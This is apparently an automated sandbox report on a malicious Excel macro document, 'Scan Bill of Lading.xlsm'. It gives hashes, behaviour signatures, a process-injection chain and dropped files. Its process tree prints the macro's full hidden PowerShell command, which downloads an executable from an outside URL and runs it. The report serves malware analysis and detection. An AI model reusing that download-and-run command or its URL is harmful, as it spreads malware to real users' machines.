Analysis
- max time kernel: 146s
- max time network: 136s
- platform: windows7_x64
- resource: win7
- submitted: 30-06-2020 06:47

Static task: static1

Behavioral task: behavioral1
- Sample: Scan Bill of Lading.xlsm
- Resource: win7

Behavioral task: behavioral2
- Sample: Scan Bill of Lading.xlsm
- Resource: win10v200430
General
- Target: Scan Bill of Lading.xlsm
- Size: 398KB
- MD5: 937aa5650aa985dd443f4a03156967c9
- SHA1: f40cd6481a66c1608a6b97580fe69f2e4904ed6d
- SHA256: f4dcd21a2e0b2f4432b665157a1f934e5063be6bbf7ef5f92b365bbbeca92331
- SHA512: 8113094f933fbd159ec1d37bd7da487e42a515bfba57c6de6c82358223b2e202c6b592ea8fff18568694ca58fdbaebfb60b53f7974743a8c8c9f4abc1af68b93

Malware Config
- Extracted: https://kyivremont.com/vbc.exe
Signatures

Checks whether UAC is enabled
Processes:
  description: Key value queried
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
  process: Explorer.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes:
  pid 1612  process EXCEL.EXE

Suspicious use of SetWindowsHookEx (5 IoCs)
Processes:
  pid 1612  process EXCEL.EXE  (5 entries)

Suspicious behavior: MapViewOfSection (6 IoCs)
Processes:
  pid 1760  process AddInProcess32.exe  (4 entries)
  pid 1564  process wuapp.exe  (2 entries)

Suspicious use of SendNotifyMessage (4 IoCs)
Processes:
  pid 1256  process Explorer.EXE  (4 entries)

Suspicious use of FindShellTrayWindow (5 IoCs)
Processes:
  pid 1256  process Explorer.EXE  (5 entries)
Modifies system certificate store
Processes:
  description: Key created
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  process: powershell.exe

  description: Set value (data)
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510
  process: powershell.exe
Suspicious use of WriteProcessMemory (25 IoCs)
Processes:
  PID 1612 wrote to memory of 1804: 1612 EXCEL.EXE -> 1804 powershell.exe  (3 entries)
  PID 1804 wrote to memory of 1964: 1804 powershell.exe -> 1964 putty.exe  (4 entries)
  PID 1964 wrote to memory of 1760: 1964 putty.exe -> 1760 AddInProcess32.exe  (7 entries)
  PID 1256 wrote to memory of 1564: 1256 Explorer.EXE -> 1564 wuapp.exe  (7 entries)
  PID 1564 wrote to memory of 1128: 1564 wuapp.exe -> 1128 cmd.exe  (4 entries)

Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
  Token: SeDebugPrivilege  pid 1804  process powershell.exe
  Token: SeDebugPrivilege  pid 1964  process putty.exe
  Token: SeDebugPrivilege  pid 1760  process AddInProcess32.exe
  Token: SeDebugPrivilege  pid 1564  process wuapp.exe

Suspicious behavior: EnumeratesProcesses (29 IoCs)
Processes:
  pid 1804  process powershell.exe  (1 entry)
  pid 1964  process putty.exe  (3 entries)
  pid 1760  process AddInProcess32.exe  (3 entries)
  pid 1564  process wuapp.exe  (22 entries)

Loads dropped DLL (1 IoCs)
Processes:
  pid 1964  process putty.exe

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process
  pid 1804  pid_target 1612  process powershell.exe  target process EXCEL.EXE

Blacklisted process makes network request (1 IoCs)
Processes:
  flow 5  pid 1804  process powershell.exe

Suspicious use of SetThreadContext (4 IoCs)
Processes:
  PID 1964 set thread context of 1760: 1964 putty.exe -> 1760 AddInProcess32.exe
  PID 1760 set thread context of 1256: 1760 AddInProcess32.exe -> 1256 Explorer.EXE  (2 entries)
  PID 1564 set thread context of 1256: 1564 wuapp.exe -> 1256 Explorer.EXE

Executes dropped EXE (2 IoCs)
Processes:
  pid 1964  process putty.exe
  pid 1760  process AddInProcess32.exe
Office loads VBA resources, possible macro or embedded object present
Processes (tree; number in brackets is the depth in the process tree)

- [1] C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - Checks whether UAC is enabled
  - Suspicious use of SendNotifyMessage
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory

  - [2] C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Scan Bill of Lading.xlsm"
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://kyivremont.com/vbc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
      - Modifies system certificate store
      - Suspicious use of WriteProcessMemory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Process spawned unexpected child process
      - Blacklisted process makes network request

      - [4] C:\Users\Admin\AppData\Local\Temp\putty.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\putty.exe"
        - Suspicious use of WriteProcessMemory
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - Executes dropped EXE

        - [5] C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetThreadContext
          - Executes dropped EXE

  - [2] C:\Windows\SysWOW64\wuapp.exe
    Command line: "C:\Windows\SysWOW64\wuapp.exe"
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetThreadContext

    - [3] C:\Windows\SysWOW64\cmd.exe
      Command line: /c del "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
- C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
- C:\Users\Admin\AppData\Local\Temp\putty.exe
- C:\Users\Admin\AppData\Local\Temp\putty.exe
- \Users\Admin\AppData\Local\Temp\AddInProcess32.exe
- memory/1128-22-0x0000000000000000-mapping.dmp
- memory/1256-18-0x0000000006C90000-0x0000000006D7B000-memory.dmp (Filesize: 940KB)
- memory/1564-23-0x0000000001E40000-0x0000000001EE4000-memory.dmp (Filesize: 656KB)
- memory/1564-20-0x00000000008A0000-0x00000000008AB000-memory.dmp (Filesize: 44KB)
- memory/1564-19-0x0000000000000000-mapping.dmp
- memory/1612-6-0x0000000006AE0000-0x0000000006BE0000-memory.dmp (Filesize: 1024KB)
- memory/1612-0-0x0000000001D40000-0x0000000001D41000-memory.dmp (Filesize: 4KB)
- memory/1612-5-0x0000000006AE0000-0x0000000006BE0000-memory.dmp (Filesize: 1024KB)
- memory/1612-4-0x0000000006AE0000-0x0000000006BE0000-memory.dmp (Filesize: 1024KB)
- memory/1612-3-0x00000000004FA000-0x00000000004FC000-memory.dmp (Filesize: 8KB)
- memory/1612-2-0x0000000001D40000-0x0000000001D41000-memory.dmp (Filesize: 4KB)
- memory/1760-15-0x0000000000400000-0x000000000042D000-memory.dmp (Filesize: 180KB)
- memory/1760-16-0x000000000041E320-mapping.dmp
- memory/1804-7-0x0000000000000000-mapping.dmp
- memory/1964-12-0x0000000000000000-0x0000000000000000-disk.dmp
- memory/1964-8-0x0000000000000000-mapping.dmp